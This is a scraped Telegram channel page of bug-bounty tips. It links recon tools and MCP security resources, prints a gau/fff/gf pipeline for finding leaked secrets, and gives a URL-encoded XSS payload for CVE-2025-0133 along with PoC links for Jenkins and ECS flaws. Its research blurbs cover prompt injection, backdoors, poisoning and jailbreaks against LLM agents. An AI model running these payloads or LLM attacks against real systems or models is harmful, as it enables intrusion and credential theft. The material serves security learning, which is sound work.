bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r


Bug bounty Tips

Find sensitive information with gf

# Search for testing points with gau and fff
# (grep -E has no (?:...) groups, so the .js/.json match is written as ERE)
gau target -subs | cut -d"?" -f1 | grep -E '\.js(on)?$' | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/

# After we save responses from known URLs, it's time to dig for secrets
# (run every gf pattern whose name contains "_secrets")
for i in $(gf -list); do [[ ${i} == *_secrets* ]] && gf "${i}"; done


Bug bounty Tips

MCP Security Resources

🔗 Awesome MCP Security:
https://github.com/Puliczek/awesome-mcp-security

🔗 Defensive Guide :
https://www.infracloud.io/blogs/securing-mcp-servers/

🔗 MCP Tool :
https://github.com/eqtylab/mcp-guardian

🔗 MCP Threat Modeling :
https://www.csoonline.com/article/4023795/top-10-mcp-vulnerabilities.html

🔗 MCP Security Research :
https://arxiv.org/pdf/2507.06250

🔗 MCP Security Article :
https://www.darkreading.com/application-security/agentic-ai-risky-mcp-backbone-attack-vectors

🔗 MCP Security 101 Guide :
https://www.redhat.com/en/blog/model-context-protocol-mcp-understanding-security-risks-and-controls

🔗 MCP Top Vulnerability :
https://cymulate.com/blog/cve-2025-53109-53110-escaperoute-anthropic/

🔗 MCP Security Video :
https://m.youtube.com/watch?v=zj29lslZxFg

@acesclan #mcp #agentic #ai


Bug bounty Tips

#info #Events #Cyber_Education

Cybersecurity Events Sep. - Dec. 2025:

1. Cyber-AI 2025 (Sep. 1-4)
2. Nullcon Berlin (Sep. 3-5)
3. Blue Team Con (Sep. 4-7)
4. SECCON 2025 (Sep. 9)
5. 44CON (Sep. 18-19)
6. National Cyber Summit (Sep. 23-25)
7. HackAICon 2025 (Sep. 25)
8. ESORICS 2025 (Sep. 22-26)
9. BruCON 2025 (Sep. 25-26)
10. COSAC 2025 (Sep.28 - Oct.2)
11. Black Hat AI Summit at SecTor (Sep.30 - Oct.2)
12. Hexacon 2025 (Oct. 4-5)
13. Offensive AI Con 2025 (Oct. 5-8)
14. c0c0n 2025 (Oct. 7-11)
15. Black Hat Fall Online Trainings (Oct. 20-23)
16. OWASP LASCON 2025 (Oct. 21-22)
17. IEEE ISSRE 2025 (Oct. 21-24)
18. DevSecCon 2025 (Oct. 22)
19. SAINTCON 2025 (Oct. 21-24)
20. IAPP Privacy.Security.Risk (Oct. 28-31)
21. OSINTCon 2025 (Nov. 1-2)
22. SANS Fall Cyber Solutions Fest - AI Track (Nov. 6)
23. DEATHCon (Nov. 8-9)
24. POC2025 Hacking Conference (Nov. 13-14)
25. SURICON 2025 (Nov. 19-21)
26. Black Hat Middle East & Africa (Dec. 2-4)
27. Black Hat Europe 2025 (Dec. 8-11)
28. Annual Computer Security Applications Conference (ACSAC2025) (Dec. 8-12)
29. BSidesTLV 2025 (Dec. 11)
30. SANS Cyber Defense Initiative (Dec. 12-17)


Bug bounty Tips

https://xmind.app/m/QsNUEz/


Bug bounty Tips

https://xmind.app/m/GeZhxV/


Bug bounty Tips

🌘 "From Prompt Injections to Protocol Exploits: Threats in LLM-Powered AI Agents Workflows", 2025.
// In this Research, we introduce the first unified, end-to-end threat model for LLM-agent ecosystems, spanning host-to-tool and agent-to-agent communications, formalize adversary capabilities and attacker objectives, and catalog over thirty attack techniques. We organized the threat model into four domains: Input Manipulation (prompt injections, long-context hijacks, multimodal adversarial inputs), Model Compromise (prompt- and parameter-level backdoors, composite and encrypted multi-backdoors, poisoning strategies), System and Privacy Attacks (speculative side-channels, membership inference, retrieval poisoning, social-engineering simulations), and Protocol Vulnerabilities (exploits in Model Context Protocol, Agent Communication Protocol, Agent Network Protocol, Agent-to-Agent protocol)

🧩 #Research #MLSecOps


Bug bounty Tips

https://github.com/PentestPad/subzy


Bug bounty Tips

#Threat_Research
#Offensive_security
"Teaching LLMs how to XSS: An introduction to fine-tuning and reinforcement learning (using your own GPU)", 2025.

// ways to automate XSS with LLMs as a learning exercise


Bug bounty Tips

List of Awesome Red Team / Red Teaming Resources. This list is for anyone wishing to learn about Red Teaming but who does not have a starting point.

https://github.com/0xMrNiko/Awesome-Red-Teaming


Bug bounty Tips

Asset inventory of over 800 public bug bounty programs.
https://github.com/trickest/inventory


Bug bounty Tips

🚨CVE-2025-0133 : Payload + Template

Payload: %3Csvg%20xmlns%3D%22http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E

Write-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9

Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml


Bug bounty Tips

#Research
#MLSecOps
"Generative AI in cybersecurity: A Comprehensive Review of LLM Applications and Vulnerabilities", 2025.

// This paper provides a comprehensive review of the future of cybersecurity through GenAI and LLMs. We explore LLM applications across various domains, including hardware design security, intrusion detection, software engineering, design verification, cyber threat intelligence, malware and phishing detection. We present an overview of LLM evolution and its current state. Our analysis extends to LLM vulnerabilities, such as prompt injection, insecure output handling, data poisoning, DDoS, and adversarial instructions


Bug bounty Tips

🚨 CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability

🔥PoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis

👇Dorks
HUNTER : http://product.name="Jenkins"

📰Refer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419

https://github.com/advisories/GHSA-qcj2-99cg-mppf


Bug bounty Tips

Hello guys, I am planning a team to attend https://16.standoff365.com/en/#how_to_join
It has 10 members per team. If you guys are interested and happy to try this CTF, let me know.


Bug bounty Tips

#Cloud_Security
Black Hat USA 2025:
"Expanding Privileges in the Cloud: Exploring Security Boundaries in Amazon ECS".
]-> PoC for CVE-Requested vulnerability in Amazon ECS allowing cross-task IAM credential theft


Bug bounty Tips

⚡Automated red-team toolkit for stress-testing LLM defences - Vector Attacks on LLMs

https://github.com/MrMoshkovitz/gandalf-llm-pentester


Bug bounty Tips

Google 🔍 Engineer dropped a book. A comprehensive guide to building agentic AI systems.

Key points:


✅Concepts: Prompt chaining, routing, memory, planning, safety, and evaluation.

✅Patterns: Design methods for multi-agent setups, tool-using agents, and autonomous workflows.

✅Hands-on: Code samples for implementing these patterns in real-world apps.

✅Goal: Help developers build reliable, scalable, and safe intelligent agents.

Think of it as a playbook for advanced AI agent design.


📱https://docs.google.com/document/d/1rsaK53T3Lg5KoGwvf8ukOUvbELRtH-V0LnOIFDxBryE/mobilebasic


Bug bounty Tips

#Tech_book
"Advanced Python for Cybersecurity: Techniques in Malware Analysis, Exploit Development, and Custom Tool Creation", 2024.

// By integrating Python into your cybersecurity arsenal, you can automate repetitive tasks, enhance your analytical capabilities, forge custom tools tailored to specific threats, and ultimately fortify your defenses against an ever-evolving adversary


Bug bounty Tips

https://xmind.app/m/XM7KaG/


Bug bounty Tips

https://xmind.app/m/bULg/


Bug bounty Tips

🔖 "Application Programming Interface (API): Vulnerabilities and Risks", Special Report
🌘 2024

// This report describes 11 common vulnerabilities and 3 risks related to APIs, providing suggestions about how to fix or reduce their impact. Recommendations include using a standard API documentation process, using automated testing, and ensuring the security of the identity and access management system

See also:
]-> API Specification Parser
]-> Tool to detect API auth weaknesses
]-> API Security Vulnerability Scanner

🧩 #AppSec #Whitepaper
🧩 #Threat_Research


Bug bounty Tips

https://xmind.app/mindmap/zseanos-methodology/TidUQd/?from=gallery#


Bug bounty Tips

#AIOps
#MLSecOps
"Security Attacks on LLM-based Code Completion Tools", v.4, AAAI 2025.
]-> example code and attack samples

// LLM-based Code Completion Tools (LCCTs) often rely on proprietary code datasets for training, raising concerns about the potential exposure of sensitive data. We exploit these distinct characteristics of LCCTs to develop targeted attack methodologies on two critical security risks: jailbreaking and training data extraction attacks


Bug bounty Tips

https://hackershelf.xyz/


Bug bounty Tips

BB Target- https://www.nooks.ai/responsible-disclosure-process


Bug bounty Tips

🔥Fresh BB Target - https://www.computerwaard.nl/.well-known/security.txt


Bug bounty Tips

DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎

Check it out! 👇
🔗
https://github.com/kevin-mizu/domloggerpp


Bug bounty Tips

Notes from "How to Crush Bug Bounties in the first 12 Months" by @hakluke


Bug bounty Tips

https://x.com/Cipher0ps_tech/status/1954777074457251865


Bug bounty Tips

#Research
"Llama-3.1-FoundationAI-SecurityLLM-8B-Instruct (FS8BI) Technical Report", 2025.
]-> https://huggingface.co/fdtn-ai/Foundation-Sec-8B-Instruct

// FS8BI - open-weight, 8-billion parameter instruction-tuned LLM specialized for cybersecurity applications. It leverages prior training to understand security concepts, terminology, and practices across multiple security domains. FS8BI enables organizations to build AI-driven security tools that can be deployed locally, reducing dependency on cloud-based AI services
